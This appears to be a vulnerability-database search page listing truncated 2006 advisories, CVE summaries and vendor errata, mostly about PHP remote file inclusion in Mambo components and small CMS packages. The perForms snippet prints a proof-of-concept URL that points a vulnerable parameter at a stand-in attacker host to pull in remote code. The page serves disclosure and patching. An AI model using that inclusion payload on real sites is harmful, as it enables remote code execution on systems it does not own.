9470 matches found
PHP Live! 3.2.1 - help.php Remote File Inclusion
Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security research Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact:...
PHP Live! 3.2.1 - 'help.php' Remote File Inclusion
Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security research Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact: aneurysmincathotmaildotcom Version: all ----------- Overvie...
CVE-2006-3798
DeluxeBB 1.07 and earlier exposes a vulnerability where a remote attacker can set the COOKIE data to overwrite the internal variables _GET, _POST, _ENV, and _SERVER during an extract function call, resulting in pollution of the global namespace and potentially multiple security vulnerabilities. A...
Mambo Component pollxt 1.22.07 - Remote File Inclusion
Application : pollxt mambo Component URL : http://www.mamboxt.com Variable $mosConfigabsolutepath not sanitized: xpl works with registerglobals=on in components/compollxt/conf.pollxt.php on line 1-2 requireonce$mosConfigabsolutepath."/administrator/components/compollxt/pollxt.class.php"; Exploit:...
Mambo Component perForms 1.0 - Remote File Inclusion
------------------------------------------------------------------------ --- perForms founds 12.000 sites ! http://www.vuln.com/components/comperforms/performs.php?mosConfigabsolutepath=http://evilhost Fix Add before code: defined'VALIDMOS' or...
CVE-2006-3615
Phorum 5.1.14 contains multiple PHP remote file inclusion vulnerabilities when register_globals is enabled. The issue allows remote attackers to execute arbitrary PHP code via vectors related to an uninitialized variable. The affected software is Phorum 5.1.14; impact is partial confidentiality, ...
php security update
CentOS Errata and Security Advisory CESA-2006:0568 Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting...
pearl24.txt
Pearl Products Multiple Remote File Inclusion Discovered By zero Moroccan Security Team Affected softwares: Pearl Forums 2.4 Ngoc Biec 1.4 Pearl For Biz 2.4 Pearl For Mambo 1.6 URL : http://sourceforge.net/projects/pearlforums/ Risk : High Impact: System access ------ PoC...
Echo Security Advisory 2006.36
ECHO.OR.ID ECHOADV36$2006 --------------------------------------------------------------------------- ECHOADV36$2006 ExtCalendar...
CentOS 3 / 4 : SquirrelMail (CESA-2005:595)
An updated squirrelmail package that fixes two security issues is now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Updated 04 Aug 2005 The previous SquirrelMail package released with this errata contained a bug which rendered the...
cbsms.txt
--------------------------------------------------------------------------- CBSMS Mambo Module = 1.0 mosConfigabsolutepath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team Remote : Yes...
Mambo Module CBSms 1.0 - Remote File Inclusion
--------------------------------------------------------------------------- CBSMS Mambo Module = 1.0 mosConfigabsolutepath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By...
FSA-018.txt
----------------------------------------------------- Advisory id: FSA:018 Author: Federico Fazzi Date: 15/06/2006, 23:36 Sinthesis: Calendarix 0.7.20060401, SQL Injection Vulnerabilities Type: low Product: http://www.calendarix.com/ Patch: unavailable...
THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability
No description provided by source. --------------------------------------------------------------------------- THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team...
THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion
--------------------------------------------------------------------------- THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team Remote : Yes Critical Level :...
CVE-2006-3207
Directory traversal vulnerability in newpost.php in Ultimate PHP Board (UPB) 1.9.6 and earlier allows remote attackers to overwrite arbitrary files via a .. (dot dot) sequence and trailing null (%00) byte in the id parameter, as demonstrated by injecting a Perl CGI script using "NR" sequences in the...
CVE-2006-3159
pipemaster in Sun ONE/iPlanet Messaging Server 5.2 HotFix 1.16 built May 14 2003 allows local users to read portions of restricted files via a symlink attack on msg.conf in a directory identified by the CONFIGROOT environment variable, which returns the first line of the file in an error message...
BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities
No description provided by source. --------------------------------------------------------------------------- Grayscale BandSite CMS =rootpath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Te...
FreeBSD : WebCalendar -- information disclosure vulnerability (09c92f3a-fd49-11da-995c-605724cdf281)
Secunia reports : socsam has discovered a vulnerability in WebCalendar, which can be exploited by malicious people to bypass certain security restrictions and disclose sensitive information. Input passed to the 'includedir' parameter isn't properly verified, before it is used in an 'fopen' call...